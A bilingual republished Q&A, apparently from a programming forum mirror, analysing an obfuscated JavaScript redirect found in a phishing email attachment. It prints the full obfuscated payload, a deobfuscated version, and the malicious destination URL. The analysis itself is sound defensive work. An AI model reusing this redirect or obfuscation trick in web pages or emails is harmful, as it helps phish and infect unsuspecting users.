这个可疑的网络钓鱼代码有什么作用？ [英] What does this suspicious phishing code do?

问题描述

我的一些非IT同事在电子邮件中打开了一个非常可疑的.html附件。当看起来运行了一些javascript代码时，它导致了一个空白屏幕。

A few of my non-IT coworkers opened a .html attachment in an email message that looks extremely suspicious. It resulted in a blank screen when it appears that some javascript code was run.

<script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script>

它做了什么？这超出了我的编程知识范围。

What did it do? It's beyond the scope of my programming knowledge.

推荐答案

它将重定向到一个网址，' http://lendermedia.com/images/z.htm '（自行承担风险）。

It will redirect to an url, 'http://lendermedia.com/images/z.htm' (follow it on your own risk).

将代码复制并粘贴到有价值的JavaScript编辑器中，并让它为您设置格式。

Copy and paste the code to a worthy JavaScript editor and have it format the source for you.

关键点：

var h = 'hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');

h 将等于' http://lendermedia.com/images/z.htm '

t = document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];

t 将包含对<$的引用c $ c> document.location

b['hIrBeTf.'.replace(/[\.BTAI]/g, '')] = h;

名为 href 的属性 b ，此时（在另一个函数内）确实是 t ，从上面的语句中设置为 h ，这是网址。

The property named href of b, which at this point (inside another function) really is t from the above statement, is set to h, which is the url.

大多数代码仅仅是噪音，实际功能包括：

Most of the code is mere noise, the actual functionality consists of this:

function uK() {
};
uK.prototype = {
  f : function() {
    var h = 'hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'
        .replace(/[\^H\!9X]/g, '');
    t = document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];
    function x(b) {
      b['hIrBeTf.'.replace(/[\.BTAI]/g, '')] = h;
    }
    x(t);
  }
};
var tL = new uK();
tL.f();

这篇关于这个可疑的网络钓鱼代码有什么作用？的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！